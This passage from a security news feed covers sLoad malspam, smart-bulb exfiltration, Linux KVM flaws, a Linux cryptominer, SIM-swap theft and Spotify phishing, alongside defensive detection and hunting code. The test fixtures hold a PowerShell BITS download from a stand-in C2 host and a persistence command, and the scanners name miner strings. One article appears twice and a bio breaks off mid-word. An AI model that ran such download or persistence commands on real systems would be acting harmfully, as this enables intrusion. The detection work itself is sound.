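// and schtasks legitimately); the detection fires only when all three occur
// in the same process tree.
const STAGES = {
  // Stage 1: PowerShell spawned by Explorer (what a double-clicked .lnk looks
  // like) whose command line references the campaign's zip name pattern.
  activator: (e, byPid) =>
    base(e.image) === "powershell.exe" &&
    base((parentOf(e, byPid) || {}).image) === "explorer.exe" &&
    /documento-aggiornato-novembre-[^\s"']*\.zip/i.test(e.cmd),
  // Stage 2: PowerShell pulling an .ini payload through BITS.
  bitsDownload: (e) =>
    base(e.image) === "powershell.exe" &&
    /start-bitstransfer|bitsadmin/i.test(e.cmd) &&
    /\b(config|web)\.ini\b/i.test(e.cmd),
  // Stage 3: persistence via a scheduled task whose action runs a .vbs.
  vbsTask: (e) =>
    base(e.image) === "schtasks.exe" &&
    /\/create/i.test(e.cmd) &&
    /[wc]script(\.exe)?.*\.vbs/i.test(e.cmd),
};

// True when `pid` is `ancestor` itself or sits anywhere below it in the tree.
function descendsFrom(pid, ancestor, byPid) {
  for (let cur = byPid.get(pid); cur; cur = byPid.get(cur.ppid)) {
    if (cur.pid === ancestor) return true;
    if (cur.pid === cur.ppid) break; // guard against self-parented roots
  }
  return false;
}

// Returns one finding per activator whose process tree also contains the
// BITS download and the VBS scheduled task; [] means the chain was not seen.
function detectSloadChain(events) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const findings = [];
  for (const root of events.filter((e) => STAGES.activator(e, byPid))) {
    const inTree = events.filter((e) => descendsFrom(e.pid, root.pid, byPid));
    const bits = inTree.find((e) => STAGES.bitsDownload(e));
    const task = inTree.find((e) => STAGES.vbsTask(e));
    if (bits && task) {
      findings.push({ rootPid: root.pid, bitsPid: bits.pid, taskPid: task.pid });
    }
  }
  return findings;
}

const PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";

// Constructed records reproducing the chain from the article.
const CHAIN_EVENTS = [
  { pid: 1, ppid: 0, image: "C:\\Windows\\explorer.exe", cmd: "explorer.exe" },
  { pid: 2, ppid: 1, image: PS,
    cmd: "powershell.exe -File activator.ps1 documento-aggiornato-novembre-2018.zip" },
  { pid: 3, ppid: 2, image: PS,
    cmd: "powershell.exe -NoProfile -Command Start-BitsTransfer -Source http://c2.example/web.ini -Destination C:\\Users\\Public\\web.ini" },
  { pid: 4, ppid: 3, image: "C:\\Windows\\System32\\schtasks.exe",
    cmd: "schtasks.exe /Create /TN Updater /TR \"wscript.exe C:\\Users\\Public\\run.vbs\" /SC MINUTE /MO 5" },
];

// Constructed benign records: BITS and schtasks used by an admin, but no
// activator stage, so nothing should fire.
const BENIGN_EVENTS = [
  { pid: 1, ppid: 0, image: "C:\\Windows\\explorer.exe", cmd: "explorer.exe" },
  { pid: 2, ppid: 1, image: PS,
    cmd: "powershell.exe -Command Start-BitsTransfer -Source https://updates.example/tool.msi -Destination C:\\Temp\\tool.msi" },
  { pid: 3, ppid: 2, image: "C:\\Windows\\System32\\schtasks.exe", cmd: "schtasks.exe /Query /TN Backup" },
];

console.log("chain  :", detectSloadChain(CHAIN_EVENTS));
console.log("benign :", detectSloadChain(BENIGN_EVENTS));
```

The zip-name pattern is campaign-specific and will age quickly; the structural part of the rule (Explorer-spawned PowerShell leading to a BITS fetch and a VBS scheduled task in one tree) is what generalises.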

Technical details, including IoCs and Yara Rules, about the sLoad malware are available on the Yoroi blog.


Pierluigi Paganini

(Security Affairs – malspam, malware)

The post The SLoad Powershell malspam is expanding to Italy appeared first on Security Affairs.

Experts demonstrate how to exfiltrate data using smart bulbs

Security researchers with Checkmarx developed two mobile applications that abuse the functionality of smart bulbs for data exfiltration.

Security researchers with Checkmarx developed two mobile applications that exploit smart bulbs features for data exfiltration.

The experts used Magic Blue smart bulbs, which communicate over Bluetooth 4.0. The devices are manufactured by the Chinese company Zengge and can be controlled using both Android and iOS apps.

The company supplies major brands such as Philips and Osram.

The experts focused their study on devices using the Low Energy Attribute Protocol (ATT) to communicate.

The first test made by the experts consisted of sniffing the communication between the smart bulbs and the paired mobile application; the pairing method used by the researchers was Just Works.

The experts paired the Android mobile phone with the iLight app and started sniffing the traffic while changing the colors of the smart bulbs.

In this way, the researchers discovered the commands sent by the mobile app to the smart bulbs. The team reverse engineered the mobile application using the jadx tool.


Once they had gained complete control of the bulbs, the experts started working on an application that leverages the light of the bulbs to transfer information from a compromised device to the attacker.

“The main plan for exfiltration was to use light as a channel to transfer information from a compromised device to the attacker. Light can achieve longer distances, which was our goal.” reads the analysis published by the experts.

“Imagine the following attack scenario: a BLE device (smartphone) gets compromised with malware. The malware steals the user’s credentials. The stolen information is sent to an attacker using a BLE light bulb nearby.”


Checkmarx experts used a smartphone connected to a telescope to receive the exfiltrated data without raising suspicion.

The researchers created two applications for the data exfiltration: one installed on the victim’s mobile device and the other on the attacker’s mobile device to receive and interpret the data.

The application installed on the victim’s device modulates the light intensity to transfer data, and it runs in either Normal or Stealth mode. Stealth mode is hard for the victim’s eye to detect because it relies on subtle shades of blue.

“We created two apps, the first app for sending the exfiltrated data and a second one for receiving it. The app that transmits the information changes the blue light intensity – weaker for binary 1 and stronger for binary 0. The app has two options: Normal mode and Stealth mode. The first one may be visible to human-eye and the stealth mode is very hard to detect because of the variations of shades of blue used.” the experts continue.

Below is a video PoC created by the experts.

“These methods will work on every smart bulb that allows control by an attacker. In the future, we would like to create a better proof of concept that allows us to test a database of vulnerable bulbs and even implement AI to learn and implement new bulbs along the way,” Checkmarx concludes.

Pierluigi Paganini

(Security Affairs – data exfiltration, smart bulbs)

The post Experts demonstrate how to exfiltrate data using smart bulbs appeared first on Security Affairs.

Security Affairs: UK Parliament seized confidential Facebook docs to investigate its data protection policies.

UK Parliament seized confidential Facebook documents from the developer of a now-defunct bikini photo searching app to investigate its data protection policies.

A British lawmaker obliged a visiting tech executive to hand over the files ahead of an international hearing that parliament is hosting on Tuesday to gather evidence on disinformation and “fake news.”

Committee Chairman Damian Collins obtained and reviewed the documents the parliament’s Digital, Culture, Media and Sport Committee has received from the app maker Six4Three relating to Facebook.

“Under UK law & parliamentary privilege we can publish papers if we choose to as part of our inquiry.”

Six4Three acquired the files, related to a period between 2013 and 2014, as part of a U.S. lawsuit against Facebook.

The authorities are investigating the changes to Facebook’s privacy policies in 2015 that led Six4Three to shut down its app, Pikinis. Pikinis was an app that allowed users to find photos of their friends in bikinis and bathing suits by searching their friends list.

Collins aims to demonstrate how abuses of Facebook could enable misinformation campaigns and interference in political elections.

Facebook executive Richard Allan will have to answer the questions of lawmakers from seven countries at the committee’s hearing in London next Tuesday.

Lawmakers from seven countries are preparing to grill Allan at the hearing. Facebook CEO Mark Zuckerberg has refused to attend.

“The U.K. committee used its powers to compel the chief executive of Six4Three, Theodore Kramer, who was on a business trip to London, to turn over the files, according to parliamentary records and news reports.” reported the AP agency.

“The committee twice requested that Kramer turn over the documents. When he failed to do so, Kramer was escorted to parliament and told he risked imprisonment if he didn’t hand them over, the Observer newspaper reported.”

Facebook opposes the disclosure of the files; a judge in California ordered them sealed earlier this year.

Allan informed Collins via email that the judge is expected to give guidance on the legal status of the documents as early as Monday.

“Six4Three’s claims are entirely meritless,” Facebook said in a statement.

Last week, Facebook announced it will appeal the fine for failing to protect the privacy of the users in the Cambridge Analytica scandal. Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

The social network giant maintains that U.K. regulators failed to prove that British users were directly affected.

Britain’s Information Commissioner’s Office (ICO) also found that the company failed to be transparent about how people’s data was harvested by others.

According to the ICO, even after the misuse of the data was discovered in December 2015, the company did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users’ data, such as the SCL Group, which was able to access the platform until 2018.

Facebook considers the fine unacceptable, arguing that many practices that are commonly accepted online also threaten the privacy of users.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post UK Parliament seized confidential Facebook docs to investigate its data protection policies. appeared first on Security Affairs.



Security Affairs: Ransomware attack disrupted emergency rooms at Ohio Hospital System

Ransomware attacks continue to threaten the healthcare industry; the latest incident impacted the Ohio Hospital System.

The ransomware attack that infected computer systems at the East Ohio Regional Hospital and Ohio Valley Medical Center reportedly disrupted the hospitals’ emergency rooms.

The malware hit the Ohio Hospital System on the evening of Friday, Nov. 23. According to The Times Ledger newspaper, the hospitals were not able to accept ER patients delivered by emergency responders.

“Emergency squad patients are being diverted away from East Ohio Regional Hospital and Ohio Valley Medical Center this weekend because the hospitals’ computer system has been attacked by Ransomware.” reads The Times Ledger newspaper.

“Area emergency squads began transporting patients to other area hospitals after receiving notification of the full diversion.”

The patients were diverted to other area hospital emergency rooms.

Karin Janiszewski, director of marketing and public relations for the hospitals, explained that the two hospitals were able to handle walk-in ER patients.

“At the moment, our emergency rooms are unable to take patients by E-squads, but we can take patients by walk-in,” Janiszewski said. “Our IT team is working around the clock right now and we expect to have the issue resolved by (Sunday).”

The IT staff plan to completely restore normal operation by Sunday, November 25. The good news is that no data was exposed due to the ransomware attack.

“We have redundant security, so the attack was able to get through the first layer but not the second layer,” she added. “There has been no patient information breach.”

Pierluigi Paganini

(Security Affairs – ransomware, Ohio Hospital System)

The post Ransomware attack disrupted emergency rooms at Ohio Hospital System appeared first on Security Affairs.



Security Affairs: When Do You Need to Report a Data Breach?

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

The number of data breaches that were tracked in the U.S. in 2017 totaled 1,579, a nearly 44.7 percent increase from the previous year. Data breaches, incidents in which personal information is accidentally or unlawfully stolen, lost, disclosed, accessed, altered or destroyed, can happen to organizations of any size and sector.

Most data breach laws deal with personal data, which is essentially any information that can be associated with a particular person. Other rules concern personally identifiable information, which is data that someone could use, alone or along with additional information, to trace or distinguish a person’s identity.

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

When Should You Report a Data Breach?

In general, you should report a personal data breach if it likely poses a risk to people and threatens their rights and freedoms. This is based on the General Data Protection Regulation (GDPR), which applies to any organization that handles the data of European Union citizens. An incident might threaten someone’s rights and freedoms if it may result in identity theft, identity fraud, financial loss, discrimination, damage to reputation, social disadvantage or loss of confidentiality.

International, federal and state laws vary in their requirements about when to report breaches. In the U.S., all 50 states, the District of Columbia, Puerto Rico, Guam and the Virgin Islands have laws that require entities to notify people of breaches involving personally identifiable information.

How Soon After a Breach Should You Report It?

Under the GDPR, an organization that experiences a personal data breach must notify the appropriate authorities within 72 hours of discovering it. Within that timeframe, data controllers are also required to conduct an investigation of the incident, identify the affected data, inform impacted individuals and create a plan for containing the breach. If the organization can’t complete these activities within 72 hours, it is expected to provide an explanation as to why.

Under the Health Insurance Portability and Accountability Act (HIPAA), entities affected by the law must inform authorities and the impacted individuals within 60 days, but only if 500 or more people are affected. Authorities for some other sectors, such as the Securities and Exchange Commission (SEC), don’t have specific timeframe requirements.

Requirements under state laws vary. In New Mexico, businesses have 45 days to issue a notification if the incident impacted 1,000 or more residents of the state. California requires companies to send out notifications if 500 or more residents are affected, but it doesn’t have a specific timeframe requirement.

Laws, of course, affect how soon companies must report cybersecurity incidents. They should also do their best to ensure they have as much accurate information as possible before sending out an alert to avoid miscommunications. If an organization waits too long, on the other hand, the damage may already be done. It’s important to strike a balance between these two extremes.

To Whom Should You Report a Breach?

Who you should notify depends on the laws that apply to you, the industry you’re in and who was affected. In many cases, you must notify the supervising authorities. Under the GDPR, for example, you need to notify the Information Commissioner’s Office. If your organization is covered by the Health Breach Notification Rule, you must notify the U.S. Federal Trade Commission (FTC) and perhaps the media. If you are covered by the HIPAA Breach Notification Rule, you’ll need to inform the U.S. Health and Human Services department.

It is advisable to tell law enforcement about a breach as quickly as possible. You may call local police, but if they are not familiar with cybersecurity incidents, you can also call your local FBI office.

If you store information for other businesses, notify them. If information pertaining to a certain organization is stolen, contact that organization. For example, if an attack results in the theft of bank account numbers, notify the affected banks. If the breaches involve names and Social Security numbers, you may need to contact the major credit bureaus.

You may also need to contact the individuals who may be affected by the breach and inform them of what data was affected, what you’re doing to address the situation and what individuals can do to protect themselves.

Why Report a Breach?

Reporting breaches of personal data enables regulating authorities, law enforcement and individuals to take action to reduce the amount of damage that may occur. Some of these authorities may also be able to help you ensure your system is secure again and prevent further data loss.

The laws that affect your organization can vary depending on your location, industry and other factors. Consider these requirements as well as what is best for the individuals affected when deciding whether to report a breach.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, data breach)

The post When Do You Need to Report a Data Breach? appeared first on Security Affairs.



Linux Kernel is affected by two DoS vulnerabilities still unpatched

Linux Kernel is affected by two denial-of-service (DoS) flaws; both vulnerabilities are NULL pointer dereference issues.

The Linux kernel is affected by two denial-of-service (DoS) vulnerabilities; the issues impact Linux kernel 4.19.2 and earlier versions.

Both flaws are rated as Medium severity and are NULL pointer dereference issues that a local attacker can exploit to trigger a DoS condition.

The first vulnerability, tracked as CVE-2018-19406, resides in the Linux kernel function kvm_pv_send_ipi implemented in arch/x86/kvm/lapic.c.

A local attacker can exploit the flaw by using crafted system calls to reach a situation where the apic map is not initialized.

“kvm_pv_send_ipi in arch/x86/kvm/lapic.c in the Linux kernel through 4.19.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) via crafted system calls that reach a situation where the apic map is uninitialized.” reads the security advisory.

“The reason is that the apic map has not yet been initialized, the testcase triggers pv_send_ipi interface by vmcall which results in kvm->arch.apic_map is dereferenced. This patch fixes it by checking whether or not apic map is NULL and bailing out immediately if that is the case.” reads a blog post published by Wanpeng Li.

The second flaw, tracked as CVE-2018-19407, resides in the Linux kernel function vcpu_scan_ioapic, defined in arch/x86/kvm/x86.c.

The flaw is triggered when the I/O Advanced Programmable Interrupt Controller (I/O APIC) has not been correctly initialized.

The vulnerability could be exploited by a local attacker using crafted system calls that reach a situation where ioapic is uninitialized.

“The vcpu_scan_ioapic function in arch/x86/kvm/x86.c in the Linux kernel through 4.19.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) via crafted system calls that reach a situation where ioapic is uninitialized.” reads the security advisory.

“The reason is that the testcase writes hyperv synic HV_X64_MSR_SINT6 msr and triggers scan ioapic logic to load synic vectors into EOI exit bitmap. However, irqchip is not initialized by this simple testcase, ioapic/apic objects should not be accessed,” reads the analysis published by Wanpeng Li.

Patches for both flaws have been posted on the Linux Kernel Mailing List (LKML), but at the time of writing they have not been merged upstream.
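To show the defect class both advisories describe, here is an added example (it is neither kernel code nor Wanpeng Li’s patch): a constructed model of a hypercall handler that dereferences a lazily allocated apic map, beside the same handler with the NULL check the fix adds. The structure names, the -1 error value and the delivery logic are assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Constructed stand-ins for the KVM state involved in CVE-2018-19406.
 * In the kernel, kvm->arch.apic_map is allocated when the in-kernel irqchip
 * is set up; until then the pointer is NULL.
 */
#define MAX_VCPUS 8

struct vcpu {
    int apic_id;
    int ipi_count;              /* how many IPIs this vCPU has received */
};

struct apic_map {
    int max_apic_id;
    struct vcpu *phys_map[MAX_VCPUS]; /* apic_id -> vcpu, NULL if absent */
};

struct vm {
    struct apic_map *apic_map;  /* NULL until the irqchip is initialised */
    struct vcpu vcpus[MAX_VCPUS];
    int nr_vcpus;
};

/* Creates a VM with nr_vcpus vCPUs but no apic_map yet (the vulnerable state). */
void vm_init(struct vm *vm, int nr_vcpus) {
    memset(vm, 0, sizeof(*vm));
    vm->nr_vcpus = nr_vcpus;
    for (int i = 0; i < nr_vcpus; i++)
        vm->vcpus[i].apic_id = i;
}

/* Models irqchip creation: the apic_map becomes valid only after this call. */
void vm_create_irqchip(struct vm *vm) {
    struct apic_map *map = calloc(1, sizeof(*map));
    map->max_apic_id = vm->nr_vcpus - 1;
    for (int i = 0; i < vm->nr_vcpus; i++)
        map->phys_map[i] = &vm->vcpus[i];
    vm->apic_map = map;
}

/*
 * Shared delivery step: signal every vCPU whose APIC id has a bit set in
 * ipi_bitmap. Returns the number of vCPUs signalled.
 */
static int deliver_ipi(struct apic_map *map, uint64_t ipi_bitmap) {
    int count = 0;
    for (int id = 0; id <= map->max_apic_id && id < 64; id++) {
        if (!(ipi_bitmap & (1ULL << id)))
            continue;
        if (map->phys_map[id]) {
            map->phys_map[id]->ipi_count++;
            count++;
        }
    }
    return count;
}

/*
 * 'Before' the fix: the handler trusts that the map exists. A guest that
 * issues the PV IPI hypercall before the irqchip is created makes this
 * dereference NULL (in the kernel that is a BUG, i.e. the DoS).
 */
int pv_send_ipi_unchecked(struct vm *vm, uint64_t ipi_bitmap) {
    return deliver_ipi(vm->apic_map, ipi_bitmap);
}

/*
 * 'After' the fix, as the page describes it: check whether the apic map is
 * NULL and bail out immediately. Returning -1 is an assumption for this
 * example; the kernel uses its own error code.
 */
int pv_send_ipi_checked(struct vm *vm, uint64_t ipi_bitmap) {
    struct apic_map *map = vm->apic_map;
    if (!map)
        return -1;              /* irqchip not initialised: refuse the request */
    return deliver_ipi(map, ipi_bitmap);
}

int main(void) {
    struct vm m;
    vm_init(&m, 4);
    /* Hypercall arrives before the irqchip exists: the checked path refuses. */
    printf("before irqchip: %d\n", pv_send_ipi_checked(&m, 0x3));
    vm_create_irqchip(&m);
    printf("after irqchip:  %d\n", pv_send_ipi_checked(&m, 0x3));
    free(m.apic_map);
    return 0;
}
```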

Pierluigi Paganini

(Security Affairs – Linux Kernel, DoS)

The post Linux Kernel is affected by two DoS vulnerabilities still unpatched appeared first on Security Affairs.

Experts found a new powerful modular Linux cryptominer

Security experts from Russian antivirus firm Dr.Web have discovered a new strain of Linux cryptominer tracked as Linux.BtcMine.174.

The Linux cryptominer has a multicomponent structure that implements a broad range of features in over 1,000 lines of code.

When the Monero-mining Trojan is first executed, it checks whether the server from which it will later download additional modules is reachable.

It then looks for a folder on disk to which it has write permissions, copies itself there, and uses that folder as a repository for the additional modules it downloads.

The Linux.BtcMine.174 cryptominer uses one of two privilege escalation exploits, for CVE-2016-5195 (aka Dirty COW) and CVE-2013-2094, to obtain root permissions on the infected system.

The Linux miner also adds itself as an autorun entry to files such as /etc/rc.local, /etc/rc.d/…, and /etc/cron.hourly, and then downloads and runs a rootkit.

“If the script is not run with /sbin/init, the following actions are performed:

  1. The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package). ” reads the analysis published by Dr. Web.

Once the malware has infected the Linux system, it scans for and terminates the processes of rival miners: it inspects /proc/${pid}/exe and /proc/${pid}/cmdline for specific strings (cryptonight, stratum+tcp, etc.). Experts also discovered that the Trojan kills antivirus software, including Avast, AVG, Dr.Web and ESET.

Then Linux.BtcMine.174 downloads and starts its own Monero-mining operation.

Linux.BtcMine.174 also downloads and executes a rootkit with the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

The Trojan also collects data on all the hosts to which the current user has previously connected via SSH and tries to connect to them.

Experts believe the malware is spreading using SSH credentials stolen on the infected systems.

Additional technical details are included in the report published by Dr.Web; the experts also published SHA1 hashes for the various components of the malware on GitHub.
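As an added example (not Dr.Web’s code and not the malware’s), a small C hunting routine that turns the process-hunting heuristic described above around for defence: it walks /proc, reads each process’s exe link and NUL-separated cmdline, and flags the strings the report names (cryptonight, stratum+tcp and the diskmanagerd watchdog name); a second helper checks an autorun file such as /etc/rc.local for the same strings. The function names and the indicator list are assumptions for this example, and the match is a plain substring test, so treat hits as leads to triage rather than verdicts.

```c
#include <ctype.h>
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Strings the report associates with the miner and its rivals: the patterns
 * it hunts in /proc and the $WatchDogName it copies itself under. The list is
 * an assumption for this example; extend it from your own analysis. */
static const char *const MINER_INDICATORS[] = {
    "cryptonight", "stratum+tcp", "diskmanagerd", NULL
};

/* Returns the indicator found in the exe path or command line, NULL if none. */
const char *miner_indicator(const char *exe, const char *cmdline) {
    for (int i = 0; MINER_INDICATORS[i]; i++) {
        if ((exe && strstr(exe, MINER_INDICATORS[i])) ||
            (cmdline && strstr(cmdline, MINER_INDICATORS[i])))
            return MINER_INDICATORS[i];
    }
    return NULL;
}

/* Reads /proc/<pid>/cmdline (argv joined by NUL bytes) into a space-joined
 * string. Returns the byte count or -1 if the file cannot be read. */
static int read_cmdline(const char *pid, char *out, size_t outlen) {
    char path[64];
    snprintf(path, sizeof(path), "/proc/%s/cmdline", pid);
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t n = fread(out, 1, outlen - 1, f);
    fclose(f);
    for (size_t i = 0; i < n; i++)
        if (out[i] == '\0') out[i] = ' ';
    out[n] = '\0';
    return (int)n;
}

/* Walks /proc and prints every process matching an indicator.
 * Returns the number flagged (0 when /proc is unavailable, e.g. off Linux). */
int scan_proc(void) {
    DIR *d = opendir("/proc");
    if (!d) return 0;
    int flagged = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (!isdigit((unsigned char)e->d_name[0]))
            continue;                       /* only numeric entries are PIDs */
        char path[64], exe[4096], cmd[4096];
        snprintf(path, sizeof(path), "/proc/%s/exe", e->d_name);
        ssize_t n = readlink(path, exe, sizeof(exe) - 1);
        exe[n > 0 ? n : 0] = '\0';          /* unreadable link -> empty path */
        if (read_cmdline(e->d_name, cmd, sizeof(cmd)) < 0)
            cmd[0] = '\0';
        const char *hit = miner_indicator(exe, cmd);
        if (hit) {
            printf("pid %s: matched '%s' exe=%s cmd=%s\n", e->d_name, hit, exe, cmd);
            flagged++;
        }
    }
    closedir(d);
    return flagged;
}

/* Checks one autorun file named in the report (e.g. /etc/rc.local) line by
 * line. Returns 1 if a line matches, 0 if clean, -1 if it cannot be opened. */
int autorun_file_flagged(const char *path) {
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    char line[1024];
    int hit = 0;
    while (fgets(line, sizeof(line), f)) {
        if (miner_indicator(NULL, line)) { hit = 1; break; }
    }
    fclose(f);
    return hit;
}

int main(void) {
    int n = scan_proc();
    printf("flagged processes: %d\n", n);
    printf("/etc/rc.local: %d\n", autorun_file_flagged("/etc/rc.local"));
    printf("/etc/cron.hourly: %d\n", autorun_file_flagged("/etc/cron.hourly"));
    return n > 0;
}
```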

Pierluigi Paganini

(Security Affairs – Linux cryptominer, Linux.BtcMine.174)

The post Experts found a new powerful modular Linux cryptominer appeared first on Security Affairs.

Security Affairs: Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-year-old man from New York, has stolen $1 million from a Silicon Valley executive via SIM swap, and targeted other individuals.

Nicholas Truglia, a 21-year-old man from New York, has been accused of stealing $1 million from a Silicon Valley executive via SIM swap. He gained access to the executive’s phone number and used it to impersonate him and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court.”

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft, although his attempts to rob the other executives ultimately failed.

Police raided Truglia’s house under a warrant and were able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time of writing, there is no news about the remaining money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that bypasses the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account because they receive the one-time PIN codes and SMS notifications sent to the victim’s phone number.

The attacker impersonates the victim and asks the mobile provider’s tech support staff to reassign the victim’s phone number to a SIM card owned by the crook. The procedure requires the attacker to answer a few security questions meant to verify the victim’s identity; typically the attacker gathers the information needed to answer them through social engineering or OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.



Security Affairs

Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-years-old man from New York, has stolen $1 million from Silicon Valley executive via SIM swap, and targeted other indivisuals.

Nicholas Truglia, a 21-years-old man from New York, has been accused of stealing $1 million from Silicon Valley executive via SIM swap. He gained access to his phone number and used it impersonate the executive and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court.”

Truglia has been charged with a total of 21 counts, including identity theft, fraud, embezzlement, and attempted grand theft; he is also accused of going after other executives, although those attempts ultimately failed.

Police searched Truglia's home under a warrant and recovered $300,000 worth of cryptocurrency from his hardware wallet. At the time of writing, there is no news about the remaining stolen funds.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

SIM swap fraud defeats the additional security measures, in particular SMS-based one-time codes and notifications, that banks and other online services introduced to protect customer accounts. Once the criminal controls the victim's phone number, the one-time PINs and SMS alerts meant for the victim are delivered to the criminal, who uses them to reset passwords and authorize transfers out of the victim's accounts.

The attacker impersonates the victim and talks the mobile carrier's support staff into reassigning the victim's phone number to a SIM card the attacker controls. The porting procedure normally requires the caller to answer a few security questions meant to verify the customer's identity; the attacker typically collects the answers in advance through social engineering or open-source intelligence (OSINT). The first sign for the victim is often that the phone suddenly loses signal, as happened to Ross. Any account that relies on SMS for password recovery or two-factor authentication is exposed once the number is hijacked; authenticator apps and hardware security keys are not affected by a SIM swap.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.

Security Affairs: Very trivial Spotify phishing campaign uncovered by experts

Researchers at AppRiver uncovered a very simple phishing campaign targeting the streaming service Spotify; it is nevertheless worth sharing information about it.

Security researchers at AppRiver uncovered a phishing campaign targeting the popular streaming service Spotify.

The campaign was discovered in early November; the attackers used convincing emails to trick Spotify users into handing over their account credentials.

The messages include a link to a phishing website that prompts users to enter their username and password. The attackers use the harvested credentials to hijack the Spotify accounts and, through credential stuffing, any accounts on other services where the victim reused the same password.

“Recently, AppRiver detected a phishing campaign that was targeting Spotify customers by email with the purpose of hijacking the owner’s account.” reads the analysis published by AppRiver.

“The attacker attempted to dupe users into clicking on a phishing link that would redirect them to a deceptive website. Once at the site, users were prompted to enter their user name and password (surprise!), giving the attacker the ability to hijack the account.”

The attackers set up a login page that looks identical to the real Spotify login page but is hosted at a URL that is not Spotify's.

The experts also pointed out that the domain in the “From” address is not Spotify's official domain.

The attackers trick victims into clicking a green button labeled “CONFIRM ACCOUNT.” The messages pose as urgent notices about restrictions on the account that the user can lift by taking action.

Clicking the button redirects the user to the phishing page.
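The two indicators AppRiver highlighted, a sender domain that is not the brand's and a link that leads to a look-alike page, are mechanical enough to check automatically. The following is an added example, not AppRiver's or Spotify's code: it parses an email, extracts the sender domain and every link target, and compares their registrable domains against the brand's known domains. The sample message is constructed to mirror the “CONFIRM ACCOUNT” lure described above; the sender and link domains in it are made up, and the allow-list of legitimate domains is an assumption for the example.

```python
"""Flag brand-impersonation phishing by checking the From domain and every
link target against the brand's legitimate domains.

Added example, not code from the AppRiver write-up. SAMPLE_EMAIL is a
constructed message modelled on the campaign; its domains are invented.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the brand really uses for mail and login pages (assumption for the
# example; a real deployment would maintain this allow-list per brand).
LEGIT_DOMAINS = {"spotify.com"}

# Constructed sample resembling the lure described in the text.
SAMPLE_EMAIL = """\
From: Spotify <no-reply@spotify-account-services.example>
To: victim@example.org
Subject: Action required: your account has been restricted
Content-Type: text/html; charset=utf-8

<html><body>
<p>We detected unusual activity. Some features are restricted until you confirm your account.</p>
<a href="https://login.spotify.example-verify.net/confirm?u=victim" style="background:#1db954;color:#fff">CONFIRM ACCOUNT</a>
<p>Need help? Visit <a href="https://support.spotify.com">support</a>.</p>
</body></html>
"""


class _LinkExtractor(HTMLParser):
    """Collect href targets of <a> tags from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def registrable_domain(host):
    """Crude eTLD+1 (last two labels). Fine for .com/.net/.org samples; a real
    tool should use the Public Suffix List (e.g. the tldextract package)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


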